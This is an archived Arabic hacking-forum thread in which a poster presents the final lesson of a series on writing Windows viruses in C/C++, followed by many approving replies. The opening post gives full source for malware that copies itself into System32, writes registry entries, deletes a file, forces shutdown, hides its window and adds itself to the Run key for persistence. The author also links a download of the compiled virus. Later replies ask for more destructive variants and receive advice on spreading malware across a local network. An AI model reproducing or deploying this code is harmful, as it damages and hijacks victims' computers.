المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : الدرس الثالث وو الاخيير في صناعة الفيروساات

A7meedye
14-08-2004, 12:49
هلااا بشباب العاصفة اليووم اقدم لكم الدرس الثالث وو الاخيير في صناعة الفيروساات بلغة C++وو أسسسف لانيي تأخرت فيي كتابة الدرس الثالث بسسبب انشغاالي :(

تكلمنا في الدرس الاول وو الثانيي عن كيفة عمل فايروس يقووم بنسخ نفسة في الرجستري وو كيفية نسخ الفايروس في اي مكاان في الوندوز وو حذف اي ملف ..

رابطة الدرس الثانيي

http://www.3asfh.net/vb/showthread.php?t=15017

في هذا الدرس سوف نضع كوود عمل shutdown حق الكمبيوتر وو اخفااء الفايروس (يعنيي عندما يفتح الضحية الفايروس سسوف يختفيي و لن يضهر الا في alt+ctrl+del ) وو نسخ الفايروس في startup لكي يعمل تلقائيا عند تشغييل الكمبيوتر..

نبدأ الدرس:

اول شيي نضع كوود الshutdown

system("shutdown -f");
كوود سهل مايبلها شييي :D

ثانيا كوود اخفاااء الفايرس
AllocConsole();
r = FindWindowA("ConsoleWindowClass",NULL);
ShowWindow (r,0);

وو يجب اضافة مكتبة اخرى
#include <mmsystem.h>

وو اضافة
#pragma comment(lib, "ws2_32.lib")
بعد
#include <mmsystem.h>
وو يجب كتابه
HWND r;
في main

و اخيرا كووود نسخ الفايرووس في startup

اول شيي يجب اضافة مكتبة اخرى
#include <stdio.h>
وو اضافة متغيراات في الmain
char directory[300];

HKEY ret;

وهذا كوود نسخ الفايروس الى startup
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&ret);

RegSetValueEx((HKEY)ret,"virus_name.exe",0,REG_SZ,(BYTE *)&directory,sizeof(directory));
انتهى الدرس ......


كووود الفايرووووس :

#include <windows.h>
#include <string.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")
char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow);
short WormCopy(char SRCFileName[], char DSTFileName[])
{
FILE *SRC, *DST;
char Buffer[1024];
short Counter = 0;
short Status = 0;
SRC = fopen(SRCFileName, "rb");
if(SRC)
{
DST = fopen(DSTFileName, "wb");
if(DST)
{
while(! feof(SRC))
{
Counter = fread(Buffer, 1, 1024, SRC);
if(Counter)
fwrite(Buffer, 1, Counter, DST);
}
Status = 1;
}
}
fclose(SRC);
fclose(DST);
return Status;
}

void main(int argc, char **argv)

{

char pathname[256],directory[300];
HKEY hKey,ret;
HWND r;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

FILE *retro;

char ProgName[100];
strcpy(ProgName, argv[0]);
WormCopy(ProgName, "c:\\virus_name.exe");
system("DEL c:\\file_name ");

system("shutdown -f");


AllocConsole();
r = FindWindowA("ConsoleWindowClass",NULL);
ShowWindow (r,0);

RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&ret);

RegSetValueEx((HKEY)ret,"virus_name.exe",0,REG_SZ,(BYTE *)&directory,sizeof(directory));


}
و اخيراا انتهت سلسله صناعة الفيروساات بلغة C++ وو انشاااء الله الكل استفد من الدرووس وو أي سؤاال او ايي مشكلة انا في الخدمة ;)


وو الحييين صااار عندك فايروووس يقووم بنسخ نفسة في الرجستري و ويسخ نفسة في اي مكاان تحددة في الوندوز وو حذف اي ملف تحددة وو عمل shutdown حق الكمبيوتر وو اخفااء نفسة ووينسخ نفسة في startup لكي يعمل تلقائيا عند تشغييل الكمبيوتر..

كاتب الدرس:
a7meedye
A7meedye
14-08-2004, 12:59
ملف الفايرررووس مع source code

http://a7medye.tripod.com/a7meedye.zip
hi_HaCkEr
14-08-2004, 01:52
يعطيك العافية احمدي ودرس اكثر من رائع

تحياتي لك
MaN~HaCkErZ
14-08-2004, 02:33
يعطيك الف الف عافيه اخوي احمدي

وإن شاء الله نلتقي في دروس اخرى

:)

تحياتي
-------
بونوره
14-08-2004, 02:47
مشكور يالاحمدي على هذه الدروس
Ssb
14-08-2004, 05:49
يعطيك العافيه اخوي على الشرح الرائع
A7meedye
14-08-2004, 02:40
مشكووورييين شباب على ردكم الحلوووو وو مروركم
|2|;)
ورود القبر
14-08-2004, 10:51
خطير و شكرا بس نبيك تسويلنا واحد حق لينكس
A7meedye
14-08-2004, 10:54
مشكووور اخيي Red Hat Server على ردك .... انشااء الله اذا عرفت على اللينكس تمام وو الفيروساات الشغالة عليية انشااء الله بسويي واااحد على شاانك
lorex
15-08-2004, 01:27
مشكووووووووووووووور
A7meedye
15-08-2004, 02:06
شكرا على مرورك lorex
Ne0
05-09-2004, 01:57
انت وين والسي ++ وين ؟؟

اخوي هذا الكود مكتوب بالسي وواضحة من الـheader الي ادرجته والي هو خاص بالسي stdio.h فكيف تقول سي ++ ؟؟

متأكد انك دارس اللغة ؟

والله بديت اشك صراحة
A7meedye
05-09-2004, 01:43
شووووف ياااا r00T 4cc33$$ ياا عبقريي الكمبيوتر تدريي مافيي احسن منك (لاتصدق الكلام)

الحمد لله انا داارس ++ C وو فاهم وو ازييدك داارس MFC كمااان وو صانع دودة بال ++C وو عنديي شهادة في ++C وانشااء الله الحيين مخطط اخذ بكلاريووس فييه
وو ماتهمنيي اذا انت شااك فينيي او لا انا عارف نفسيي و الكل يعرفنيي ولو تقوول عن نفسك خبييير راونيي شطارتك

والله صدق من قاال ان فيي ناااس جهلة كثييييييير

A7meedye صانع الدودة w32.A7meedye.worm
Ssb
05-09-2004, 02:50
اخوي احمدي انت لايهمك كلام العذال
اهم شي رأيك انت في نفسك
والبرنامج اللي فوق انا اتحدى ابو الشباب اللي تكلم ويقول انها مو سي ++
ياخوي انا ادرس بالجامعه ولغات البرمجه هي مجال تخصصي
والبرنامج اللي مكتوب فوق لو انت مومصدق انه مكتوب بالسي ++
نزل برنامج السي ++ عندك وجرب سويله كومبايل وبعدين رن
وشوف ذيك الساعه تقدر تحكم على البرنامج
واسف على الإطاله
space toon
05-09-2004, 10:12
°ˆ~*¤®§(*§*)§®¤*~ˆ°جزاك الله خيرا علي هذا المجهود°ˆ~*¤®§(*§*)§®¤*~ˆ°
A7meedye
05-09-2004, 10:20
شكرااا اخيي ssb على ردك .... مادريي الاخ اشفيييه علييي مادريي انا سوييت له شيي وو انا مادرييي :D
space toon شكرا على مرورك
cracker_firas
06-09-2004, 12:36
الله يعطيعك العافية اخوي و بعون الله بدات انا و اعوذ بالله من كلمت انا موضوع جديد كيف يتم عمل الفايروس علي النوت باد و انشاء الله يعجبكوم
A7meedye
06-09-2004, 12:42
مشكووور cracker_firas على مرورك
الوحش الاسود
07-09-2004, 04:11
مشكور احميدي

يعطيك العافيه


تحياتي

بومريومه
A7meedye
07-09-2004, 12:36
شكرااا على مرورك الوحش الاسود
Stormy_Killer
07-09-2004, 03:26
اشكرك اخوي على الدروس الرائعه وفعلا كود الفيرس هو اساس لصناعة اخطر الفيروسات ولغة الc++ من اقوى اللغات في امكانياتها....موفق ان شاء الله وننتظر منك المزيد.
A7meedye
07-09-2004, 03:34
شكرااا Stormy_Killer على مرورك
SisQo^^007
14-09-2004, 04:43
مشكور حبيبيبي على الدرس الرهيب .. وانشاء الله نكون كلنه فاهمين الدرس عدل ....
++++++++++++++++
وانت ماشاء الله عليك .. فنان .... لان العالم كله .... فيجول بيسك بس انت ++c والله انك رهيب ...

تحياتي للجميع
A7meedye
14-09-2004, 03:27
تسلم على الرد اخيي SisQo^^007

الناااس يبوون شيي سهل وو الفيجواال سهل وو انا كانت بدايتيي بالفيجواال ;)
SisQo^^007
21-09-2004, 08:18
كلامك عدل ... بالفعل الفيجول بيسك اشويه سهل ....... بس على فكره تره أنا مليت وانا انطر فايرسك المطور ...
شد حيلك يا الحبيب نبيه فايرس قوى ... يعني مثلا .. تحرق الرام ... مثلا ... شغله كذا حلوه بالجهاز .. تره مللنه من الفايرسات الي تنسخ نفسه وبعد الفورمات ... كنه ما صار شي .... يعني تره شوف فايرس MoRTaL يحرق البروسسور ... هههههههه يعني الجهاز نسبت الاضرار 100%
يالله يا حبيبيبي نحن بنتظارك ..
A7meedye
21-09-2004, 09:16
احتااج وقت كثير حق الفايروس الجديد لان في اشياااء كثييرة وو تحتااج وقت (شغلة شوييي صعبة وو طويلة و انا شغاال عليية الحيين)

انشااء الله بجرب الهارد في الفايروس بس ما اضمن لك لاني ولا مرة جربت :)
sneek
01-10-2004, 05:40
مشكور يا اخ a7meedye

والله يعطيك العافية

ولكن انا عندي سؤال لو يكون عندي فيروسات وبرسلها لمواقع للشبكه

هل هناك برنامج مخصص لها

والف شكر

تحياتي اخوك sneek
A7meedye
01-10-2004, 06:28
هلااا بييك sneek

تقصد شبكة داخليية ولا مواقع؟؟

اذا شبكة داخليية شووف لك ايي برنامج اخترااق وو اخترق لك اي كمبيوتر وو نشرة بواسطتة او شووف لك وررم ينتشر في الشبكة

او اذا موقع ما اعتقد يصييير
alsherif
09-10-2004, 12:17
شكرا اخي العزيز على الدروس هذي
A7meedye
09-10-2004, 12:18
شكرا على مرورك
Yossi
09-10-2004, 12:26
مشكوررر اخوي A7meedye
A7meedye
09-10-2004, 12:36
شكراا على مرورك اخيي Yossi
Yossi
09-10-2004, 12:40
مشكوررر اخوي A7meedye
* الهكرهكر *
14-10-2004, 02:01
مشكور ما قصرت
وكل عام وانت بصحة وسلامة وعافيه

تقبل الله منا ومنكم صالح الأعمال
A7meedye
15-10-2004, 12:37
تسلم اخيي الهكر هكر على مرورك
matrix_dxm_1510
15-10-2004, 01:34
مشكور ياأخى على الموضوع الجميل ده
A7meedye
15-10-2004, 01:37
شكرا على مرورك
adn
18-10-2004, 08:44
السلام عليكم يا إخوان
بالنسبة لكلام الأخ أحمدي ممكن استخدام ملفات الهيدر التابعة للسي مع سي ++ وذي مافيها كلام لأنه سي هي الأساس
والأخ ممكن اتلخبطت عليه الهيدر فقط ..... ممكن ياأحمدي تستخدم iostream.h بدل stdio.h
لأنها للمدخلات والمخرجات في سي++

أما الأخ ssb فعمل الكومبايل مو شرط للتفرقة بين اللغتين فكمبايل السي++ بيسمحلك بعمل كمبايل للسي لا و كمان للأسمبلي ويضيف كود أسمبلي وسط سي++ وسي

الموضوع اختلاف وجهات نظر فقط
وشكراً
A7meedye
19-10-2004, 12:24
شكرا على مرورك ... بس مايحتااج تستخدم الهيدر iostream لانیی ما استخدمت المدخلات او المخرجاات
خطر الشبكة
24-01-2005, 06:34
رائع و الله
الدرس مفهوم و جميل جداً
تقبل تحياتى
A7meedye
24-01-2005, 08:26
شكرا على مرورك
torjan horse
25-01-2005, 05:37
مشكور اخ احمد ويعطيك العافية يا باشاا
كتائب القسام
27-01-2005, 11:24
السلام عليكم
والله موضوعك دمار يا اخى
لكن ممكن تحط الى رابط الموضوع الاول
سلام
A7meedye
30-01-2005, 02:57
شكراا على مرورك ... بس الموضووع الاول انحذف بسبب مشاكل في المنتدى
J.o.C.K.é.Y
10-02-2005, 10:36
شكرا احمدي علي الاكواد
A7meedye
11-02-2005, 08:10
شكراا على مرورك اخيي Jockey
DeseeL|[
14-02-2005, 08:41
يعطيك الف عافيه مشرفنا المبدع

احترامي
A7meedye
14-02-2005, 12:17
شكرااا اخيي ديزل على مرورك
Eddy_BAck0o
13-07-2005, 03:55
مشكوررررررررر يلمبدع وطنش هلكلام الهايت ولا يهمك ,,,,

استاذ واثق من نفسه وبدروسعه اتشرف حضور دروسه ...


خالص تحياتي خوي .
A7meedye
13-07-2005, 01:48
شكراا اخيي eddy_back0o على مرورك
ZaaL
21-09-2005, 05:55
زعيم والله :)
M_Rummaneh
21-09-2005, 01:07
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين :
الله يطيك العافية على هالمعلومات الحلوة كتيييييييييييييييييييييييييييييييييييييييييييييييي ييييييييييييييييييييييييييييييييييييييييير
الخبير1
26-12-2005, 11:18
مشكور اخي المبدع A7meedye بعملك وشرحك الجميل جدا

ماقصرت اخي وجزاك الله عنا خير الجزاء

وتسلم يمينك يارب
abdokelaly
18-06-2006, 02:41
شرح رائع يا A7meedye
شكرا
هدوء السحاب
21-06-2006, 02:11
مشكوووووووووووووووووور اخوي على هذا الدرس الموفيد
A7meedye
22-06-2006, 01:01
شكراا شباب على مروركم :)
The_Trojan
01-09-2007, 10:20
شكرا على الكود اخي بس انظر الصورة خرب الجهاز من الفيرس تبعك اول مانزلتة انظر

7
7
7
7
7
7
77
7
7
7
7
7
7
7
7
7
7
7
7
7
7
77
7
7
7
7
7
7
77
7
7
7
7
77
7
7
7
7
77
7
7


هههههههههههه امزح معك مشكوور على الكود والشرح :d